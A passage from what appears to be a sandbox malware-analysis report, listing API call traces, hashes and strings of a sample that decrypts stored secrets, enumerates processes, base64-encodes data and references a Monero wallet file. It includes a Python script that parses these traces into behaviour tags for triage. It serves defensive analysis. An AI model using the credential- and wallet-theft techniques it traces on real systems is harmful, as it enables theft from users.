                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 24563d6791b7ffc33462247603f96b9e547b3d15b2847b7c983bf277a6109709
                                        • Instruction ID: 56e98bd9fc6f7c6a3d222a63adea168f229dc774c39a8d84b30b45b281af13a4
                                        • Opcode Fuzzy Hash: 24563d6791b7ffc33462247603f96b9e547b3d15b2847b7c983bf277a6109709
                                        • Instruction Fuzzy Hash: 5C112AB2904158ABCB14DFCADD85BBEB7F8FB4CB11F14422AF605A2280E2395944C7B5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009DEBE0,00000000,?,00CC0E10,00000000,?,00000000,00000000), ref: 00CB7A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009DEBE0,00000000,?,00CC0E10,00000000,?,00000000,00000000,?), ref: 00CB7A7D
                                        • wsprintfA.USER32 ref: 00CB7AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
                                        • Instruction ID: cce7383aad24f5e90af1b7df325b9e8e9e935d3fc967820078b357050bbba7c5
                                        • Opcode Fuzzy Hash: a7a9f1853e4521cd719357920b4d25e188b40bedf995caee2bc2eb421cff5d27
                                        • Instruction Fuzzy Hash: A4118EB1945218EFEB208F55DC49FA9BB78FB44721F1043AAF91AA72C0D7742A44CF51
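The function summaries above (the two Toolhelp32 process-enumeration loops, the CRYPT32 base64 encode and decode pairs, and the GetLocalTime / GetTimeZoneInformation formatting routines) are what a triager actually reads first, so it is worth decoding their raw arguments against the SDK constants: 00000002 to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, 00000128 to Process32First/Next is sizeof(PROCESSENTRY32) for an ANSI 32-bit build, and 40000001 to CryptBinaryToStringA is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF (single-line base64, the form a stealer puts into an exfiltration request). The Python below is an added example written for this page; it is not Joe Sandbox or IDA-plugin code. It parses summary lines in the format shown here into structured calls, decodes the hex immediates, and derives behaviour tags. The sample blocks are copied from the entries above; the regular expression, the tag names and the heuristics are the example's own assumptions.

```python
import re

# Windows SDK constants used to decode the hex immediates in the summaries.
TH32CS_SNAPPROCESS = 0x00000002         # CreateToolhelp32Snapshot dwFlags: processes only
SIZEOF_PROCESSENTRY32_ANSI_X86 = 0x128  # dwSize the loop must pass to Process32First/Next
CRYPT_STRING_FORMATS = {                # low word of the CRYPT32 dwFlags argument
    0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
    0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX", 0x5: "CRYPT_STRING_HEXASCII",
    0x6: "CRYPT_STRING_BASE64_ANY", 0x7: "CRYPT_STRING_ANY", 0xC: "CRYPT_STRING_HEXRAW",
}
CRYPT_STRING_MODIFIERS = {              # high bits OR-ed onto the format
    0x20000000: "CRYPT_STRING_STRICT", 0x40000000: "CRYPT_STRING_NOCRLF",
    0x80000000: "CRYPT_STRING_NOCR",
}

# One summary line: "[Part of subcall function X: ]Api.MODULE(args), ref: ADDR"
# (regex is this example's assumption about the report layout, not a documented format)
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_call(line):
    """Parse one summary line; '?' becomes None, 8-hex-digit tokens become ints."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = []
    for tok in (m.group("args") or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        if tok == "?":
            args.append(None)              # value not recoverable from the dump
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
            args.append(int(tok, 16))      # immediate or pointer
        else:
            args.append(tok)               # string literal resolved by the plugin
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None}


def parse_block(text):
    return [c for c in map(parse_call, text.splitlines()) if c]


def decode_crypt_string_flags(flags):
    names = [CRYPT_STRING_FORMATS.get(flags & 0xFFFF, f"format_0x{flags & 0xFFFF:x}")]
    return names + [n for bit, n in sorted(CRYPT_STRING_MODIFIERS.items()) if flags & bit]


def crypt_flags(calls):
    """ref -> decoded dwFlags (3rd parameter) for every CRYPT32 string call."""
    return {c["ref"]: decode_crypt_string_flags(c["args"][2]) for c in calls
            if c["module"] == "CRYPT32" and len(c["args"]) > 2 and isinstance(c["args"][2], int)}


def literal_strings(calls):
    """String arguments the plugin resolved, e.g. wallet file paths."""
    return sorted({a for c in calls for a in c["args"] if isinstance(a, str)})


def tag_function(calls):
    """Behaviour tags (this example's own names) from the direct, non-subcall API set."""
    direct = {c["api"] for c in calls if not c["subcall"]}
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= direct:
        snap = next(c for c in calls if c["api"] == "CreateToolhelp32Snapshot")
        first = next(c for c in calls if c["api"] == "Process32First")
        if snap["args"][:1] == [TH32CS_SNAPPROCESS] and \
           first["args"][1:2] == [SIZEOF_PROCESSENTRY32_ANSI_X86]:
            tags.append("process_enumeration")
        if direct & {"StrCmpCA", "StrCmpCW", "lstrcmpA", "lstrcmpiA", "lstrcmpW"}:
            tags.append("process_name_compare")   # name match inside the loop
    if direct & {"CryptBinaryToStringA", "CryptBinaryToStringW"}:
        tags.append("base64_encode")
    if direct & {"CryptStringToBinaryA", "CryptStringToBinaryW"}:
        tags.append("base64_decode")
    if direct & {"GetLocalTime", "GetSystemTime", "GetTimeZoneInformation"} \
       and direct & {"wsprintfA", "wsprintfW"}:
        tags.append("time_fingerprint")           # host time/zone rendered to text
    return tags


# Sample inputs copied from the function summaries in this report.
PROCESS_SCAN = r"""• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CB961E
• Process32First.KERNEL32(00CC0ACA,00000128), ref: 00CB9632
• Process32Next.KERNEL32(00CC0ACA,00000128), ref: 00CB9647
• StrCmpCA.SHLWAPI(?,00000000), ref: 00CB965C
• CloseHandle.KERNEL32(00CC0ACA), ref: 00CB967A"""
WALLET_SCAN = r"""  • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CC05B7), ref: 00CB86CA
• Process32First.KERNEL32(?,00000128), ref: 00CB86DE
• Process32Next.KERNEL32(?,00000128), ref: 00CB86F3
  • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
  • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
  • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
  • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
• CloseHandle.KERNEL32(?), ref: 00CB8761"""
B64_ENCODE = r"""• CryptBinaryToStringA.CRYPT32(00000000,00CA5184,40000001,00000000,00000000,?,00CA5184), ref: 00CB8EC0"""
B64_DECODE = r"""• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CA4EEE,00000000,00000000), ref: 00CA9B2A
• LocalFree.KERNEL32(?,?,?,?,00CA4EEE,00000000,?), ref: 00CA9B3F"""
LOCAL_TIME = r"""• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79B0
• RtlAllocateHeap.NTDLL(00000000), ref: 00CB79B7
• GetLocalTime.KERNEL32(?,?,?,?,?,00CC0E00,00000000,?), ref: 00CB79C4
• wsprintfA.USER32 ref: 00CB79F3"""

if __name__ == "__main__":
    for name, blk in [("PROCESS_SCAN", PROCESS_SCAN), ("WALLET_SCAN", WALLET_SCAN),
                      ("B64_ENCODE", B64_ENCODE), ("B64_DECODE", B64_DECODE), ("LOCAL_TIME", LOCAL_TIME)]:
        calls = parse_block(blk)
        print(name, tag_function(calls), literal_strings(calls), crypt_flags(calls))
```

The dwSize check matters in practice: a loop that passes the wrong PROCESSENTRY32 size never iterates, so a matching size together with a compare inside the loop is stronger evidence of a real process-name scan than the three Toolhelp32 imports alone. The two CryptStringToBinaryA calls around LocalAlloc are the standard size-query-then-decode idiom, which is why the decode block is tagged from the API set rather than from call count.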
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .z}$qAo~$xeos$EkG
                                        • API String ID: 0-1606161968
                                        • Opcode ID: 6c186d96e562a94e9529ce3cffccd3211b99a2dda781c509901d562d7faa22d2
                                        • Instruction ID: 2ab2c9fe1d5e9e05afdcf82c15fa182aaab9bc442575895926b62b8bd7eb3bb2
                                        • Opcode Fuzzy Hash: 6c186d96e562a94e9529ce3cffccd3211b99a2dda781c509901d562d7faa22d2
                                        • Instruction Fuzzy Hash: CA425AF3A082109FE3046E2DEC8567ABBD9EF94760F1A893DEAC4C7744E5755C018792
                                        APIs
                                        • CoCreateInstance.COMBASE(00CBE118,00000000,00000001,00CBE108,00000000), ref: 00CB3758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00CB37B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 4e295b1b5fae0845782ec37e99b323c88510512b2945de0f9bb05e75de232526
                                        • Instruction ID: e4cd05ab30b3e7fc9eea53906eb116bd07215510680a1b4d645c7bee3b71ddbe
                                        • Opcode Fuzzy Hash: 4e295b1b5fae0845782ec37e99b323c88510512b2945de0f9bb05e75de232526
                                        • Instruction Fuzzy Hash: DD41F770A40A289FDB24DB58CC94BDBB7B5BB48702F4051D9E608EB2D0E771AE85CF51
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA9B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00CA9BA3
                                        • LocalFree.KERNEL32(?), ref: 00CA9BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 4c2b1d6e7317b4007a94edb1b0b12f579b523f1a4535de19738090554f8525b1
                                        • Instruction ID: 087221703145568a01ac806f27599db82a97cf23c7e6fa1111eac9df37f7bd80
                                        • Opcode Fuzzy Hash: 4c2b1d6e7317b4007a94edb1b0b12f579b523f1a4535de19738090554f8525b1
                                        • Instruction Fuzzy Hash: 2711C9B8A00209EFCB04DF94D989AAE77B5FF89304F1045A9F915AB350D770AE54CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4z3$Fip/
                                        • API String ID: 0-1922856788
                                        • Opcode ID: 6e0df2d47e4d477ab8afa0e2d878a0568f4b71576cbbfbe8a37368720b777e3a
                                        • Instruction ID: 2544725a0e86eb99ad1cfec873a00ae8f53fde2d366ee0c6ba7d6d7cf051a1f0
                                        • Opcode Fuzzy Hash: 6e0df2d47e4d477ab8afa0e2d878a0568f4b71576cbbfbe8a37368720b777e3a
                                        • Instruction Fuzzy Hash: E3B206F360C2049FE3046E2DEC8567ABBE9EFD4320F1A4A3DE6C4C7744EA7558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: CWO
                                        • API String ID: 0-159657330
                                        • Opcode ID: 84f4b6c47fe3a70e24b1284e97464f918b8dcef8ac1d4d4f136deb41ad7f598b
                                        • Instruction ID: 9634e602cb5a7a79e094d836a98f2ed4ed09b34a094b77dda882e366c02e92ce
                                        • Opcode Fuzzy Hash: 84f4b6c47fe3a70e24b1284e97464f918b8dcef8ac1d4d4f136deb41ad7f598b
                                        • Instruction Fuzzy Hash: 0C7145F3F083145BF304592AEC8476AB6CAEBE4320F1A863DAA98973C4E9794C054285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: LMow
                                        • API String ID: 0-2764092925
                                        • Opcode ID: b4f187cbaeaf5cb9c28ee563d34b622893dd5136599ae92d6faf7528b9762cb8
                                        • Instruction ID: daa27f7367deae29f529b938f1baecf948ce307acffc9e2723bbd48639f42db0
                                        • Opcode Fuzzy Hash: b4f187cbaeaf5cb9c28ee563d34b622893dd5136599ae92d6faf7528b9762cb8
                                        • Instruction Fuzzy Hash: CB7127F3D086104BE3086E2DDC4576AFBE5EF94710F1B893DDAD993B84E939980186C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 1o?k
                                        • API String ID: 0-2833669673
                                        • Opcode ID: 1234ea919423ad58f1680418e60e484e4d0c9f7308a459410314341981525d57
                                        • Instruction ID: 9bfb5690ebf062e3ae1f330977b9cf9df4afdd580c9d3a86bbea71cdf65b2439
                                        • Opcode Fuzzy Hash: 1234ea919423ad58f1680418e60e484e4d0c9f7308a459410314341981525d57
                                        • Instruction Fuzzy Hash: C3516BB761C510EFE34C9A199C04A7B77D5EBC5760F13092EE8E2C7A40F770489182A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                         • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: vEm
                                        • API String ID: 0-3739008277
                                        • Opcode ID: cce7e61571809e82e7ad40463ff4f2b83c19583b2b061b337c65483941f4e41b
                                        • Instruction ID: 73ca00de80d6f39f873dc6380b0f49c5393bcd1352d02819311b26464a957157
                                        • Opcode Fuzzy Hash: cce7e61571809e82e7ad40463ff4f2b83c19583b2b061b337c65483941f4e41b
